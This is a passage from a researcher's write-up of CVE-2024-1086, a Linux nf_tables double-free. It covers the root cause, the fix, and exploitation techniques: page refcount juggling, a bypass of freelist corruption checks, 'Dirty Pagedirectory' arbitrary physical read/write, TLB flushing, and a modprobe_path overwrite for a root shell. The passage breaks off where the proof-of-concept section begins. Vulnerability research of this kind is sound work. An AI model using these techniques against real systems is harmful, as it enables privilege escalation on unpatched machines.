The important details of the dataflow analysis are that when creating a verdict object for a netfilter hook, the kernel allowed positive drop errors. This meant an attacking user could cause the scenario below, where nf_hook_slow() would free an skb object when NF_DROP is returned from a hook/rule, and then return NF_ACCEPT as if every hook/rule in the chain returned NF_ACCEPT. This causes the caller of nf_hook_slow() to misinterpret the situation, and continue parsing the packet and eventually double-free it.

// userland API (netlink-based) handler for initializing the verdict 
static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
			    struct nft_data_desc *desc, const struct nlattr *nla)
{
	u8 genmask = nft_genmask_next(ctx->net);
	struct nlattr *tb[NFTA_VERDICT_MAX + 1];
	struct nft_chain *chain;
	int err;

	// [snip] initialize memory

	// malicious user: data->verdict.code = 0xffff0000
	switch (data->verdict.code) {
	default:
		// data->verdict.code & NF_VERDICT_MASK == 0x0 (NF_DROP)
		switch (data->verdict.code & NF_VERDICT_MASK) {
		case NF_ACCEPT:
		case NF_DROP:
		case NF_QUEUE:
			break;  // happy-flow
		default:
			return -EINVAL;
		}
		fallthrough;
	case NFT_CONTINUE:
	case NFT_BREAK:
	case NFT_RETURN:
		break;  // happy-flow
	case NFT_JUMP:
	case NFT_GOTO:
		// [snip] handle cases
		break;
	}

	// successfully set the verdict value to 0xffff0000
	desc->len = sizeof(data->verdict);

	return 0;
}

Codeblock 3.2.1: The nft_verdict_init() kernel function written in C, which constructs an netfilter verdict object.

// looping over existing rules when skb triggers chain
int nf_hook_slow(struct sk_buff *skb, struct nf_hook_state *state,
         const struct nf_hook_entries *e, unsigned int s)
{
    unsigned int verdict;
    int ret;

    for (; s < e->num_hook_entries; s++) {
        // malicious rule: verdict = 0xffff0000
        verdict = nf_hook_entry_hookfn(&e->hooks[s], skb, state);  

        // 0xffff0000 & NF_VERDICT_MASK == 0x0 (NF_DROP)
        switch (verdict & NF_VERDICT_MASK) {  
        case NF_ACCEPT:
            break;
        case NF_DROP:
            // first free of double-free
            kfree_skb_reason(skb,
                     SKB_DROP_REASON_NETFILTER_DROP);  
            
            // NF_DROP_GETERR(0xffff0000) == 1 (NF_ACCEPT)
            ret = NF_DROP_GETERR(verdict);  
            if (ret == 0)
                ret = -EPERM;
            
            // return NF_ACCEPT (continue packet handling)
            return ret;  

        // [snip] alternative verdict cases
        default:
            WARN_ON_ONCE(1);
            return 0;
        }
    }

    return 1;
}

Codeblock 3.2.2: The nf_hook_slow() kernel function written in C, which iterates over nftables rules.

static inline int NF_HOOK(uint8_t pf, unsigned int hook, struct net *net, struct sock *sk, 
	struct sk_buff *skb, struct net_device *in, struct net_device *out, 
	int (*okfn)(struct net *, struct sock *, struct sk_buff *))
{
	// results in nf_hook_slow() call
	int ret = nf_hook(pf, hook, net, sk, skb, in, out, okfn);

	// if skb passes rules, handle skb, and double-free it
	if (ret == NF_ACCEPT)
		ret = okfn(net, sk, skb);

	return ret;
}

Codeblock 3.2.3: The NF_HOOK() kernel function written in C, which calls a callback function on success.

3.3. Bug impact & exploitation

As said in the subsection above, this bug leaves us with a very powerful double-free primitive when the correct code paths are hit. The double-free impacts both struct sk_buff objects in the skbuff_head_cache slab cache, as well as a dynamically-sized sk_buff->head object ranging from kmalloc-256 up to order 4 pages directly from the buddy-allocator (65536 bytes) with ipv4 packets (perhaps even more with ipv6 jumbo packets?).

The sk_buff->head object is allocated through a kmalloc-like interface (kmalloc_reserve()) in __alloc_skb(). This allows us to allocate objects of a dynamic size. Hence, we can allocate slab objects from size 256 to full-on pages of 65536 bytes from the buddy allocator. An functional overview of this can be found in the page allocaction subsection of the background info section.

The size of the sk_buff->head object is directly influenced by the size of the network packet, as this object contains the packet content. Hence, if we send a packet with e.g. 40KiB data, the kernel would allocate an order 4 page directly from the buddy-allocator.

When you try to reproduce the bug yourselves, the kernel may panic, even when all mitigations are disabled. This is because certain fields of the skb - such as pointers - get corrupted when the skb is freed. As such, we should try to avoid usage of these fields. Fortunately, I found a way to bypass all usage which could lead to a panic or usual errors and get a highly reliable double-free primitive. I'm highlighting this in the respective subsection within the proof-of-concept section.

3.4. Bug fixes

When I reported the bug to the kernel developers, I proposed my own bug fix which regretfully had to introduce a specific breaking change in the middle of the netfilter stack.

Thankfully, one of the maintainers of the subsystem came up with their own elegant fix. Their fix sanitizes verdicts from userland input in the netfilter API itself, before the malicious verdict is even added. The specific fix makes the kernel disallow drop errors entirely for userland input. The maintainer mentions however that if this behaviour is needed in the future, only drop errors with n <= 0 should be allowed to prevent bugs like these. This is because positive drop errors like 1 will overlap as NF_ACCEPT.

Additionally, the vulnerability was assigned CVE-2024-1086 (this was before the Linux kernel became an CNA and ruined the meaning of CVEs).

A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.

The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.

We recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.

Codeblock 3.4.1: The description of CVE-2024-1086.

--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -10988,16 +10988,10 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
 	data->verdict.code = ntohl(nla_get_be32(tb[NFTA_VERDICT_CODE]));
 
 	switch (data->verdict.code) {
-	default:
-		switch (data->verdict.code & NF_VERDICT_MASK) {
-		case NF_ACCEPT:
-		case NF_DROP:
-		case NF_QUEUE:
-			break;
-		default:
-			return -EINVAL;
-		}
-		fallthrough;
+	case NF_ACCEPT:
+	case NF_DROP:
+	case NF_QUEUE:
+		break;
 	case NFT_CONTINUE:
 	case NFT_BREAK:
 	case NFT_RETURN:
@@ -11032,6 +11026,8 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
 
 		data->verdict.chain = chain;
 		break;
+	default:
+		return -EINVAL;
 	}
 
 	desc->len = sizeof(data->verdict);
--

Codeblock 3.4.2: C code diff of the nft_verdict_init() kernel function being patched against the bug.

You can learn more about their fix on the kernel lore website: "[PATCH nf] netfilter: nf_tables: reject QUEUE/DROP verdict parameters."

4. Techniques

4.1. Page refcount juggling

The first technique required for the exploit is juggling page refcounts. When we attempt to double-free a page in the kernel using the dedicated API functions, the kernel will check the refcount of the page:

void __free_pages(struct page *page, unsigned int order)
{
	/* get PageHead before we drop reference */
	int head = PageHead(page);

	if (put_page_testzero(page))
		free_the_page(page, order);
	else if (!head)
		while (order-- > 0)
			free_the_page(page + (1 << order), order);
}

Codeblock 4.1.1: C code of the __free_pages() kernel function with original comments.

The refcount is usually 1 before we free the page (unless it is shared or something, then it is higher). If the pages' refcount is below 0 after it is decremented, it will refuse to free the page (put_page_testzero() will return false). This means that we shouldn't be able to double-free pages... unless?

The active readers will notice that several child-pages will then be freed until order-- == 0. However, after the first page free the page order is set to 0. Hence during the 2nd free where said code gets ran, no pages will be freed since order-- == -1. The fact that the page order gets set to 0 after a page free will be abused to convert the double-free pages to order 0 in the "Setting page order to 0" technique section.

In the context of a double-free: when we free the page for the 1st time, the refcount will be decremented to 0 and hence the page will be freed as the code above allows it to be. However, when we try free the page for 2nd time, the refcount will be decremented to -1 and it will not be freed since the refcount != 0 and may even raise a BUG() if CONFIG_DEBUG_VM is enabled.

So, how do we double-free pages then? Simple: allocate the page again before the 2nd free, as the free will look like a non-double-free free considering there is an actual object in the page. This can be any object with the same size, such as a slab or a pagetable, which is what I'm utilizing with the exploit.

In the most simplistic form, the implementation of this technique will look like this:

static void kref_juggling(void)
{
    struct page *skb1, *pmd, *pud;

    skb1 = alloc_page(GFP_KERNEL);  // refcount 0 -> 1
    __free_page(skb1);  // refcount 1 -> 0
    pmd = alloc_page(GFP_KERNEL);  // refcount 0 -> 1
    __free_page(skb1);  // refcount 1 -> 0
    pud = alloc_page(GFP_KERNEL);  // refcount 0 -> 1

    pr_err("[*] skb1: %px (phys: %016llx), pmd: %px (phys: %016llx), pud: %px (phys: %016llx)\n", skb1, page_to_phys(skb1), pmd, page_to_phys(pmd), pud, page_to_phys(pud));
}

Codeblock 4.1.2: C code of a custom kernel module, containing comments describing page refcounts.

In terms of cleaning this up post-exploitation, it's incredibly easy: just free both objects at will, as the kernel will refuse to double-free the page because of the refcount. :-)

4.2. Page freelist entry order 4 to order 0

When an allocation happens through __do_kmalloc_node() (such as skb's), the size of the allocated object is checked against KMALLOC_MAX_CACHE_SIZE (the maximum slab-allocator size). If the object is larger than that, one of the page allocators will be used instead of the slab-allocator. This is useful when we want to deterministically free pages like the skb data and allocate pages like PTE pages using the same algorithms and freelists. However, the value of KMALLOC_MAX_CACHE_SIZE is equivalent to PAGE_SIZE * 2, which means that kmalloc will be using the page allocators for allocations above order 1 (2 pages, or 8096 bytes).

Unfortunately enough, some objects we may want to target are exclusively allocated by page allocators whilst still falling within the size of the slab-allocator. For example, a developer may use alloc_page() instead of kmalloc(4096), because this saves overhead. An example of this is a PTE page (or any other pagetable page for that sake), which uses page allocations of order 0 (1 page, or 4096 bytes).

If we would double-free an object of 4096 bytes (an order==0 page) handled by the slab-allocator, it would end up in the slabcaches, not in the pagecache. Hence, in order to double-alloc pages in the order==0 freelist, we need to convert the order 4 (16 page) freelist entries from our double-free to the order 0 (1 page) freelist entries.

Luckily, I found 2 methods to allocate order==0 pages with order==4 page freelist entries.

4.2.1. Draining the PCP list

This method takes advantage of the fact that the PCP-allocator is basically a set of per-CPU freelists for the buddy-allocator. When one of those PCP freelists are empty, it will refill pages from the buddy-allocator.

For a functional overview of the page allocation process (including if statements, and the slab-allocator and buddy-allocator), check the page allocation subsection in the background section.

Illustration 4.2.1.1: Timeline of memory operations to set a page order to 0.

The refill happens in bulks of count = N/order page objects. Hence, the function rmqueue_bulk() (which is used for the refill) allocates count pages with order order from the buddy-allocator. When allocating a page from the buddy-allocator, it will traverse the buddy page freelist, and if the buddy freelist entries' order >= order, then it will return this page for the refill. If the buddy freelist entries' order > order, then the buddy-allocator will internally divide the page.

Notice that our exploit double-free's order==4 pages, and needs to fill those with order==0 PCP pages. When we free it, the order==4 page is added to the buddy-freelist. For our exploit we want to place an order==0 page into these 16 pages, because the order==4 page will be double-freed. The allocation for order==0 pages happens with the PCP allocator, which has per-order freelists. However, the PCP-refill mechanism will take any buddy-page if it fits. Hence, we can allocate 16 PTE pages into the double-freed order==4 page.

As said, in order to trigger this mechanism we must first drain the PCP freelist for the target CPU by spraying page allocations. In my exploit I do this by spraying PTE pages, and this is directly related to the Dirty Pagedirectory technique. Because we cannot tell if the PCP freelist was drained, we need to assume one of the sprayed objects is allocated in the double-free object. Hence, I spray PTE objects so an PTE object takes the spot of one of the double-free'd buddy pages. If I wanted to allocate an PMD object, I would spray PMD objects, et cetera.

The amount of objects in the freelists differs per system and per resource usage. For the exploit I used 16000 PTE objects which is - in all cases I encountered - enough to empty the freelist.

static int rmqueue_bulk(struct zone *zone, unsigned int order,
			unsigned long count, struct list_head *list,
			int migratetype, unsigned int alloc_flags)
{
	unsigned long flags;
	int i;

	spin_lock_irqsave(&zone->lock, flags);
	for (i = 0; i < count; ++i) {
		struct page *page = __rmqueue(zone, order, migratetype, alloc_flags);
		if (unlikely(page == NULL))
			break;

		list_add_tail(&page->pcp_list, list);
		// [snip] set stats
	}

    // [snip] set stats
	spin_unlock_irqrestore(&zone->lock, flags);

	return i;
}

Codeblock 4.2.1.2: C code of the rmqueue_bulk() kernel function, which refills the PCP freelist.

4.2.2. Race condition (obsolete)

>> This technique is obsolete, but was used for kernelctf exploit <<

The first free() append the page to the correct freelist, and will set the page order to 0. However when doing a double-free (2nd free), the page will be added to the freelist for order 0 since that's what the page order is for that page. This way, we can add order==4 pages to the order==0 freelists with a double-free primitive.

Illustration 4.2.2.1: Timeline of memory operations to set a page order to 0.

Less luckily, this technique is a race condition. When a page is freed for the 2nd time without a intercepting alloc (free; free; alloc; alloc), the refcount of the page will drop below 0 and will not allow a double-free, so we need to do page reference juggling (free; alloc; free; alloc). However, then the order will not be 0 at the 2nd free, because the alloc will set the order to the original amount (i.e. order 4). Now, converting the page to order 0 seems impossible since it should be either no free at all (refcount -1), or the page being the original order (proper scenario). Enter: the race condition.

When a page is freed its order is passed by value. This means that if the double-freed page gets allocated during the 2nd free, it will be allocated to the freelist of order 0 and will have the refcount incremented, so it will not hit -1 and be 0 as it should be. As you can imagine, the race window is quite small since it consists of a few function calls. However, the free_large_kmalloc() function prints a kernel WARN() to dmesg if the order is 0, which it is because of the double-free. Usually, this only provides 1ms for the window, but for virtualized systems like QEMU VMs with serial terminals, the window is 50ms-300ms, which is more than enough to hit.

Now we have successfully attached the page the order 0 freelist, which means that we can now overwrite the page with any order-0 page allocation. We can also convert the 1st page reference (acquired with the 1st free) by freeing that object and reallocating it as a new object since the page order will persist. If we are using page refcount juggling, we want to free the object which took the first freed reference.

4.3. Freeing skb instantly without UDP/TCP stacks

When we are avoiding freelist corruption checks, we may want to free a certain skb directly at will at an arbitrary time, so our exploit can work in a very fast, synchronous manner with less chance of corruption.

Note that this behaviour is typically done with local UDP packets, but the skb gets corrupted after the first free in the double-free, which means I cannot use the TCP or UDP stacks for this, which utilized corrupted fields.

OBSOLETE (KERNELCTF EXPLOIT): Alternatively, we may want to free a certain skb on a specific CPU to bypass double-free detection, since the sk_buff freelist is per-CPU. This means that if we double-free an object across 2 CPUs directly after each other, the double-free will not be detected. We cannot "shoot the previous skb to the moon" (a.k.a. allocating a never expiring skb) to prevent double-free detection since this would alter the skb head pages by either changing the pointer, or by allocating the same pointer from the freelist preventing an double-free anyways.

Fortunately, IP packet fragmentation and its fragment queues exist. When an IP packet is waiting for all its fragments to be received, the fragments are placed into an IP frag queue (red-black tree). When the received fragments have the expected length of the full IP packet, the packet is reassembled on the CPU the last fragment came from. Please note that this IP frag queue has a timeout of ipfrag_time seconds, which will free all skb's. Changing this timeout is mentioned in the subsection hereafter.

If we wanted to switch the freelist of skb freelist entry skb1 from CPU 0 to CPU 1, we would allocate it as an IP fragment to a new IP frag queue on CPU 0. Then, we send skb2 - the final IP fragment for the queue on CPU 1. This causes skb1 to be freed on CPU 1.

This same behaviour can be used to free skb's at will, without using UDP/TCP code. This is benificient for the exploit, since the double-free packet is corrupted when it is freed for the first time. If we would use UDP code, the kernel would panic due to all sorts of nasty behaviour.

Illustration 4.3.1: Timeline of activities to switch an skb's per-CPU freelist.

Unfortunately, the IP fragment queue's final size is determined by skb->len, which is fully randomized after the free due to overlaps with the slabcache's s->random. For details, check the next subsection. This means that it is practically impossible to complete the IP frag queue consistently because it will use a random expected length.

Hence, I came up with a different strategy: instead of completing the IP frag queue we make it raise an error using invalid input. This will cause all skb's in the IP frag queue to be freed instantaneously on the CPU of the erroring skb, regardless of skb->len.

When implementing this technique yourself, note that double-free detection (CONFIG_FREELIST_HARDENED) will be triggered if you do not append "innocent" skb objects between free skb1 and alloc skb2. For demonstrative purposes these have been left out in the diagram, but are included in the PoC sections.

4.3.1. Modifying skb max lifetime

For our exploit we may want skb's to live shorter or longer, depending on the usecase. Luckily, the kernel provides an userland interface to configure IP fragmentation queue timeout times over at /proc/sys/net/ipv4/ipfrag_time. This is specific per network namespace, and can hence be set as unprivileged user in their own networking namespace.

When we use IP fragments to reassemble an split IP packet, the kernel will wait ipfrag_time seconds before issuing a timeout. If we set ipfrag_time to 999999 seconds, the kernel will let the fragment skb live for 999999 seconds. Invertedly, we can also set it to 1 second if we want to swiftly allocate and deallocate an skb on a random CPU.

static void set_ipfrag_time(unsigned int seconds)
{
	int fd;
	
	fd = open("/proc/sys/net/ipv4/ipfrag_time", O_WRONLY);
	if (fd < 0) {
		perror("open$ipfrag_time");
		exit(1);
	}

	dprintf(fd, "%u\n", seconds);
	close(fd);
}

Codeblock 4.3.1.1: C code of an userland function to set the ipfrag_time variable.

4.4. Bypassing KernelCTF skb corruption checks

The only mitigation I had to actively bypass in the KernelCTF mitigation instance were freelist corruption checks, specifically the one that checks if the freelist next ptr in an object being allocated is corrupted.

Unfortunately, the freelist next ptr overlaps with skb->len since skbuff_head_cache->offset == 0x70. This means that the next/previous freelist entry pointer is stored at sk_buff+0x70, which coincidentally overlaps with skb->len. Online sources told me s->offset is usually set to half the slab size by kernel developers to avoid OOB writes from being able to overwrite freelist pointers, which in the past led to easy privesc using OOB bugs.

After the 1st skb free, the skb->len field gets overwritten with a partial next ptr value. In the code leading up to skb's 2nd free, the skb->len field gets modified because of packet parsing. Hence, the freelist next ptr gets corrupted even before the 2nd skb free.

When we try to allocate the freelist entry of the 1st skb free (after said corruption) using slab_alloc_node(), the freelist next ptr in the freed object gets flagged for corruption in calls invoked by freelist_ptr_decode():

static inline bool freelist_pointer_corrupted(struct slab *slab, freeptr_t ptr,
	void *decoded)
{
#ifdef CONFIG_SLAB_VIRTUAL
	/*
	 * If the freepointer decodes to 0, use 0 as the slab_base so that
	 * the check below always passes (0 & slab->align_mask == 0).
	 */
	unsigned long slab_base = decoded ? (unsigned long)slab_to_virt(slab) : 0;

	/*
	 * This verifies that the SLUB freepointer does not point outside the
	 * slab. Since at that point we can basically do it for free, it also
	 * checks that the pointer alignment looks vaguely sane.
	 * However, we probably don't want the cost of a proper division here,
	 * so instead we just do a cheap check whether the bottom bits that are
	 * clear in the size are also clear in the pointer.
	 * So for kmalloc-32, it does a perfect alignment check, but for
	 * kmalloc-192, it just checks that the pointer is a multiple of 32.
	 * This should probably be reconsidered - is this a good tradeoff, or
	 * should that part be thrown out, or do we want a proper accurate
	 * alignment check (and can we make it work with acceptable performance
	 * cost compared to the security improvement - probably not)?
	 */
	return CHECK_DATA_CORRUPTION(
		((unsigned long)decoded & slab->align_mask) != slab_base,
		"bad freeptr (encoded %lx, ptr %p, base %lx, mask %lx",
		ptr.v, decoded, slab_base, slab->align_mask);
#else
	return false;
#endif
}

Codeblock 4.4.1: C code of the kernel function freelist_pointer_corrupted() (KernelCTF mitigation instance), including the original comments.

After some research, I figured out that this check is not ran retroactively: when we free an object on top of the object with a corrupted freelist entry, the mitigation does not check if the previous object has a corrupted next ptr. This means that we can mask an invalid next ptr by freeing another skb after it, and then allocate that skb again with the data of the old skb. This basically masks the original corrupted skb, whilst still being able to double-alloc the skb data.

The diagram below tries to explain this phenomenon by performing a double-free on an skb object like the exploit in this blogpost.

Illustration 4.4.2: Sequence overview of bypassing the freelist corruption detection in the KernelCTF mitigation kernel.

The KernelCTF devs could mitigate this by checking the freelist head next ptr for corruption when freeing, not only when allocating.

4.5. Dirty Pagedirectory

4.5.1. The train of thought

Dirty Pagetable is one of the most interesting techniques I have encountered so far. When I was researching ready-made techniques to exploit the double-free bug Dirty Pagetable came to surface, and it seemed like a perfect technique.

However I did realize that consistent writing to the PTE page would be an unpleasant experience in the context of my double-free bug. I was unable to find any page-sized objects which allowed to be fully overwritable with userdata, whilst also being in the same page freelist as the PTE pages. I did not want to use cross-cache attacks for stability and compatiblity related reasons, as this would introduce more complexity into the exploit.

Next came a night full of brainstorming which gave me the following idea: considering I have a double-free in the same freelist as PTEs - what if it were possible to double allocate PTEs across processes, such as sudo and the exploit. This would essentially perform memory sharing (pointing the exploit virtual addresses to sudo's physical addresses) between the two completely unrelated processes. Hence, it would presumably be possible to manipulate the application data of an process running under root, and leverage that for a root shell. This turned out to be a bit unpractical considering there were other allocations happening as a process gets started, so there would need to be very good position management on the freelist.

This gave me the next idea: what if it were possible to double-allocate an exploit PTE page and an exploit PMD page, as this would mean that the PMD would dereference the PTE's page (as PTE value) as PTE and hence resolve the PTE's userland pages as PTE.

Fortunately enough, this PMD+PTE approach works. Alternatives such as PUD+PMD have been confirmed working as well, and perhaps PGD+PUD works too. The only difference is the amount of pages simulationously mirrored: 1GiB pages with PTE+PMD, 512GiB with PUD+PMD, and presumably 256TiB with PGD+PUD (if this is even possible). Keep in mind that this has impact on memory usage, and the system may go OOM with too much memory mirrored.

Additionally, the integration of Dirty Pagedirectory needs to be considered when choosing between PMD+PTE and PUD+PMD. I explain this in the PTE spraying section, but in general PMD+PTE should be the best choice.

4.5.2. The technique

The Dirty Pagedirectory technique allows unlimited, stable read/write to any memory page based on physical addresses. It can bypass permissions by setting its own permission flags. This allows our exploit to write to read-only pages like those containing modprobe_path.

In this section I explain PUD+PMD, but it boils down to the same as the PMD+PTE strategy from the PoC exploit.

The technique is quite simplistic in nature: allocate a Page Upper Directory (PUD) and Page Middle Directory (PMD) to the same kernel address using a bug like a double-free. The VMAs should be seperate, to avoid conflicts (a.k.a. do not allocate the PMD within the area of the PUD). Then, write an address to the page in the PMD range and read the address in the corresponding page of the PUD range. The diagram below tries to explain this phenomenon (complementary to the example under it).

Illustration 4.5.2.1: Hierachy overview of the Dirty Pagedirectory technique, including required memory operations.

To make things more hands-on, let's imagine the following scenario: the infamous modprobe_path variable is stored in a page at PFN/physical address 0xCAFE1460. We apply Dirty Pagedirectory: double-allocate the PUD page and PMD page via mmap for respective userland VMA ranges 0x8000000000 - 0x10000000000 (mm->pgd[1]) and 0x40000000 - 0x80000000 (mm->pgd[0][1]).

This automatically means that mm->pgd[1][x][y] is always equal to mm->pgd[0][1][x][y] because both mm->pgd[1] and mm->pgd[0][1] refer to the address/object as we double-allocated them. Observe how mm->pgd[0][1][x][y] is a userland page, and that mm->pgd[1][x][y] is a PTE. This means that the dedicated PUD area will interpret a userland page from the PMD area like a PTE.

Now, to read the physical page address 0xCAFE1460 we set first entry of the PUD areas' PTE value to 0x80000000CAFE1867 (added PTE flags) by writing that value to 0x40000000 (a.k.a. userland address for page @ mm->pgd[0][1][0][0]+0x0). Because of the entanglement rule above, this means that we wrote that value to the PTE address for page @ mm->pgd[1][0][0]+0x0, since mm->pgd[1][0][0] == mm->pgd[0][1][0][0]. Now, we can dereference that malicious PTE value by reading page mm->pgd[1][0][0][0] (last index 0 since we wrote it to the first 8 bytes of the PTE: notice 0x0 above). This is equal to userland page 0x8000000000.

Because the PTE is now changed from userland, we need to flush the TLB because the TLB will contain outdated record. Once that's done, printf('%s', 0x8000000460); should print /sbin/modprobe or whatever value modprobe_path is. Naturally, we can now overwrite modprobe_path by doing strcpy((char*)0x8000000460, "/tmp/privesc.sh"); (there's KMOD_PATH_LEN bytes padding) and drop a root shell. This does not require TLB flushing because the PTEs themselves have not changed when writing to the address.

Observe how we set the read/write flags in PTE value 0x80000000CAFE1867. Note that 0x8 in virtual address 0x8000000460 and PTE value0x80000000CAFE1867 has nothing to do with each other: in the PTE value it is a flag turned on, and the virtual address just happens to start with 0x8.

This boils down to: write PTE values to userland pages in the VMA range of 0x40000000 - 0x80000000, and dereference them by reading and writing corresponding userland pages in the VMA range of 0x8000000000 - 0x10000000000.

4.5.3. The mitigations

I have used this technique to bypass a lot of mitigations currently in the kernel (among others: virtual KASLR, KPTI, SMAP, SMEP, and CONFIG_STATIC_USERMODEHELPER), albeit other mitigations are bypassed in the PoC exploit with a little redneck engineering.

When this technique was peer-reviewed I got asked how it was able to bypass SMAP. The answer is quite simple: SMAP only works with virtual addresses and not for physical memory addresses. PTEs are referred to in PMDs by their physical address. This means that when a PTE entry in a PMD is a userland page, it will not be detected by SMAP because it is not a virtual addresses. Hence, the PUD area can happily use the userland page as a PTE without SMAP intereference.

It would be possible to mitigate this technique by setting an table entries' type in the entry and use it to detect when a PMD is allocated on the place of an PUD since we cannot forge PMD entries and PUD entries themselves. An example is setting type 0 for PTEs, 1 for PMDs, 2 for PUDs, 3 for P4Ds, 4 for PGDs, et cetera. However, this would require 2log(levels) bits to be set in each table entry (3 bits when P4D is enabled, since levels=5) which would sacrifice space intended for features in the future, as well as the runtime checks presumably introducing a great deal of overhead since each level for each memory access has to be checked. Additionally, this mitigation would still allow for forced memory sharing (i.e. overlapping an exploit PTE page with an PTE page of sudo, running as root).

4.6. Spraying pagetables for Dirty PD

You may notice that that the Dirty Pagedirectory section above mentions PUD+PMD, but the proof-of-concept uses PMD+PTE. This is related to the fact that the exploit drains the PCP list to allocate a PTE in the double-free'd address.

First off, pagetables are allocated by the kernel on demand, so if we mmap'd a virtual memory area the allocation does not happen. Only when we actually read/write this VMA it will allocate the required pagetables for the accessed page. When allocating a PUD for instance, the PMD, PTE, and userland page will be allocated. When allocating a PTE, the target userland page will also be allocated.

The original Dirty Pagetable paper mentions that - very elegantly - you can spray specific pagetable levels by allocating the parents first, since a parent (i.e. PMD) contains 512 children (PTEs). Hence, if we wanted to spray 4096 PTEs, we would need to pre-allocate 8 (4096/512 = 8) PMDs, before allocating the PTEs.

If we spray PMDs, the PTEs will be allocated as well - from the same freelist. This means that 50% of the spray is PMD, and 50% is PTE. If we would spray PUDs, it would be 33% PUD, 33% PMD, and 33% PTE. Hence, if we spray PTEs, it will be 100% PTE since we are not doing any other allocations. Because of this, we use PMD+PTE in the exploit and not PUD+PMD, and spraying PMDs means 50% less stability.

Note that userland pages themselves are allocated from a different freelist (migratetype 0, not migratetype 1).

4.7. TLB Flushing

TLB flushing is the practice of removing or invalidating all entries in the translation lookaside buffer (virtual address to physical address caching). In order to scan addresses reliably using the Dirty Pagedirectory technique, we need to come up with a TLB flushing technique that satisfies the following requirements:

Does not modify existing process pagetables
Has to work 100% of the time
Has to be quick
Can be triggered from userland
Has to work regardless of PCID

Based upon these requirements I came up with the following idea: when allocating PMD and PTE memory areas you should mark them as shared, and then fork() the process, make the child munmap() it for a flush, and make the child go to sleep (to avoid crashes if the underlying exploit is unstable). The result is the following function:

static void flush_tlb(void *addr, size_t len)
{
	short *status;

	status = mmap(NULL, sizeof(short), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	
	*status = FLUSH_STAT_INPROGRESS;
	if (fork() == 0)
	{
		munmap(addr, len);
		*status = FLUSH_STAT_DONE;
		PRINTF_VERBOSE("[*] flush tlb thread gonna sleep\n");
		sleep(9999);
	}

	SPINLOCK(*status == FLUSH_STAT_INPROGRESS);

	munmap(status, sizeof(short));
}

Codeblock 4.7.1: C code of an userland function which flushes the TLB for a certain virtual memory range.

The locking mechanism prevents the parent from continuing execution before the child has flushed the TLB. It could presumably be removed if the child performs a process exit instead of sleeping, as the parent could monitor for the childs process state.

This TLB flushing method has worked 100% of the times to refresh pagetables and pagedirectories. It has been tested on a recent AMD CPU and in QEMU VMs. It should be hardware independent, since the flush HAS to be triggered from the kernel in this usecase.

4.8. Dealing with physical KASLR

Physical Kernel Address Space Layout Randomization (Physical KASLR) is the practice of randomizing the physical base address of the Linux kernel. Usually, this is not important since nearly all exploits work with virtual memory (and therefore have to deal with virtual KASLR).

However, because of the nature of our exploit - which utilizes Dirty Pagedirectory - we need to have the physical address of the memory we want to read/write to.

4.8.1. Getting the physical kernel base address

Usually, this means we would need to bruteforce the entire physical memory range to find the physical target address.

Physical memory refers to all forms usable of physical memory addresses: e.g. on a laptop 16GiB RAM stick + 1GiB builtin MMIO = 17GiB physical memory on the device.

However, one of the quirks of the Linux kernel is that the physical kernel base address has to be aligned to CONFIG_PHYSICAL_START (i.e. 0x100'0000 a.k.a. 16MiB) bytes if CONFIG_RELOCATABLE=y. If CONFIG_RELOCATABLE=n, the physical kernel base address will be exactly at CONFIG_PHYSICAL_START. For this technique, we assume CONFIG_RELOCATABLE=y, since it would not make sense to bruteforce physical KASLR if we knew the address.

If CONFIG_PHYSICAL_ALIGN is set, this value will be used for the alignment instead of CONFIG_PHYSICAL_START. Note that CONFIG_PHYSICAL_ALIGN is usually smaller, like 0x20'0000 a.k.a. 2MiB, which means more addresses need to be bruteforced (8 times more than with an alignment of 0x100'0000).

Assuming the target device has 8GiB physical memory, this means that we can reduce our search area to 8GiB / 16MiB = 512 possible physical kernel base addresses since we know the base address has to be aligned to CONFIG_PHYSICAL_START bytes. The advantage is that we only have to check the first few bytes of the first page of the 512 addresses to check if that page is the kernel base.

We can essentially figure out the physical kernel base address by bruteforcing a few hundred physical addresses. Fortunately, Dirty Pagedirectory allows for unlimited read/writes of entire pages, and hence allows us to read 4096 bytes per physical (page) address, and even more fortunately 512 page addresses per PTE overwrite. This requires us to only overwrite the PTE once to figure out the physical kernel base address if our machine has 8GiB memory.

In order to properly recognize which of those 512 physical addresses contains the kernel base, I have written get-sig: a few Python scripts to generate a giant memcmp-powered if statement which finds overlapping bytes between different kernel dumps.

4.8.2. Getting the physical target address

When we find the physical base address, we can find the final target address of our read/write operation - if it resides within the kernel area - using hardcoded offsets based on the physical kernel base, or by scanning the ~80MiB physical kernel memory area for data patterns of the target.

The data scanning technique requires 1 + 80MiB/2MiB ~= 40 PTE overwrites on a system with 8GiB memory. If we have access to Dirty Pagedirectory and the format of the target data is unique (like modprobe_path's buffer), the data pattern scanning method is better due to broader compatibility across kernel versions, and especially if we do not know the offsets when compiling the exploit.

Please note ~80MiB for the memory scanning technique is an estimation and will probably be less in reality, and it can even be optimized to a smaller memory area because certain targets may reside at certain areas which have a certain offset. For example, kernel code may appear from offset +0x0 from the base address, whilst kernel data may always start from e.g. +0x1000000 regardless of the kernel used because the kernel size remains pretty consistent. Hence, if we were searching for modprobe_path, we could simply start at +0x1000000, but this has not been tested.

5. Proof of Concept

5.1. Execution

Let's breach the mainframe, shall we? The general outlines of the exploit can be derived from the diagram below. In this section I'm trying to link the subsections to this diagram for clarity.

Note that the exploit in this section refers to the new version, not the original KernelCTF mitigation exploit (the new one works on the mitigation instance as well). That write-up will be published seperately in the KernelCTF repository.

Feel free to read along with the source code of the exploit, which is available in my CVE-2024-1086 PoC repository.

Illustration 5.1.1: An birdseye execution overview of the exploit stages.

5.1.1. Setting up the environment

To trigger the bug we need to set up a certain network environment and usernamespaces.

5.1.1.1. Namespaces

